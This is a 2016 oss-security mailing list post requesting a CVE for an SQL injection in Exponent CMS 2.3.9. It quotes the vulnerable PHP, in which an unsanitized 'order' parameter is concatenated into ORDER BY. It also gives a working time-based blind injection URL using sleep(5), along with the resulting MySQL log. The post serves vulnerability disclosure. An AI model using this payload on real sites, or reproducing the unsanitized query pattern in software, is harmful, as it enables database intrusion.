|
Message-ID: <CAJ8RaNZJHLm59Hc5TZQOBX-DdohC1FG00YWd_yS56QmNHAggig@mail.gmail.com> Date: Mon, 19 Sep 2016 08:17:53 -0400 From: 王禹哲 <0xtom4to@...il.com> To: oss-security@...ts.openwall.com Cc: cve-assign@...re.org Subject: CVE request - Exponent CMS 2.3.9 SQL injection Author: Tomato jianing.wang@...itin.com Data: 2016–09–19 Version: 2.3.9 and earlier /exponent–2.3.9/framework/core/subsystems/expPaginator.php if (strstr($this->order," ")) { $orderby = explode(" ",$this->order); $this->order = $orderby[0]; $this->order_direction = $orderby[1]; } if ($this->dontsort) $sort = null; else $sort = $this->order.' '.$this->order_direction; // figure out how many records we're dealing with & grab the records //if (!empty($this->records)) { //from Merge <~~ this doesn't work. Could be empty, but still need to hit. if (!empty($this->categorize)) $limit = null; else $limit = $this->limit; if (isset($params['records'])) { // if we pass $params['records'], we WANT to hit this // sort the records that were passed in to us if (!empty($sort)) usort($this->records,array('expPaginator', strtolower($this->order_direction))); // $this->total_records = count($this->records); } elseif (!empty($class)) { //where clause //FJD: was $this->class, but wasn't working... $this->total_records = $class->find('count', $this->where); $this->records = $class->find('all', $this->where, $sort, $limit, $this->start); } elseif (!empty($this->where)) { //from Merge....where clause $this->total_records = $class->find('count', $this->where); $this->records = $class->find('all', $this->where, $sort, $limit, $this->start); } else { //sql clause //FIXME we don't get attachments in this approach //$records = $db->selectObjectsBySql($this->sql); //$this->total_records = count($records); //this is MUCH faster if you supply a proper count_sql param using a COUNT() function; if not, //we'll run the standard sql and do a queryRows with it //$this->total_records = $this->count_sql == '' ? $db->queryRows($this->sql) : $db->selectValueBySql($this->count_sql); //From Merge // $this->total_records = $db->countObjectsBySql($this->count_sql); //$db->queryRows($this->sql); //From most current Trunk if (!empty($sort)) $this->sql .= ' ORDER BY '.$sort; i can controller $order ,i can use this parameter to sql injection such as exponent–2.3.9/framework/modules/company/controllers/companyController.php function showall() { expHistory::set('viewable', $this->params); $page = new expPaginator(array( 'model'=>$this->basemodel_name, 'where'=>1, 'limit'=>(isset($this->params['limit']) && $this->config['limit'] != '') ? $this->params['limit'] : 10, 'order'=>isset($this->params['order']) ? $this->params['order'] : 'rank', 'page'=>(isset($this->params['page']) ? $this->params['page'] : 1), 'controller'=>$this->baseclassname, 'action'=>$this->params['action'], 'columns'=>array( gt('Manufacturer')=>'title', gt('Website')=>'website' ), )); assign_to_template(array( 'page'=>$page, 'items'=>$page->records )); } the poc is http://127.0.0.1/exponent-2.3.9/index.php?controller=company&action=showall&limit=1&order=(select/**/*/**/from/**/(select/**/sleep(5))x)%23 in the mysql log we can see this SELECT * FROM exponent_companies WHERE 1 ORDER BY (select/**/*/*/from/*/(select/**/sleep(5))x)# ASC LIMIT 0,10 Could you assign CVE id for this? Regards, Tomato
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.